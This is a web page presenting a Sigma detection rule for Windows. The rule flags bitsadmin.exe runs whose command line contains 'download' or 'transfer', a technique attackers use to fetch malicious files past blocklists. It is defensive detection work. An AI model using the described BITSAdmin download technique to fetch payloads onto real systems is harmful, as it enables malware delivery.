BITSAdmin Downloading Malicious Binaries

calendar Mar 26, 2024 · attack.command_and_control attack.t1105  ·
Share on: linkedin copy

It is not unusual for adversaries, including ones who peddle ransomware, to use BITSAdmin to download arbitrary files from the internet in an effort to evade application blocklisting. The following analytic will look for the execution of bitsadmin.exe with command options that suggest a file is being downloaded. Part of the RedCanary 2024 Threat Detection Report.

Sigma rule (View on GitHub)

 1title: BITSAdmin Downloading Malicious Binaries
 2id: b195646e-8455-4fa1-b78a-91bb92371152
 3status: experimental
 4description: |
 5    It is not unusual for adversaries, including ones who peddle ransomware, to use 
 6    BITSAdmin to download arbitrary files from the internet in an effort to evade 
 7    application blocklisting. The following analytic will look for the execution of 
 8    bitsadmin.exe with command options that suggest a file is being downloaded. Part 
 9    of the RedCanary 2024 Threat Detection Report.    
10references:
11    - https://redcanary.com/threat-detection-report/techniques/ingress-tool-transfer/
12author: RedCanary, Sigma formatting by Micah Babinski
13date: 2024/03/21
14tags:
15    - attack.command_and_control
16    - attack.t1105
17logsource:
18    category: process_creation
19    product: windows
20detection:
21    selection:
22        Image|endswith: '\bitsadmin.exe'
23        CommandLine|contains:
24            - 'download'
25            - 'transfer'
26    condition: selection
27falsepositives:
28    - Unknown
29level: low```

References

Related rules

to-top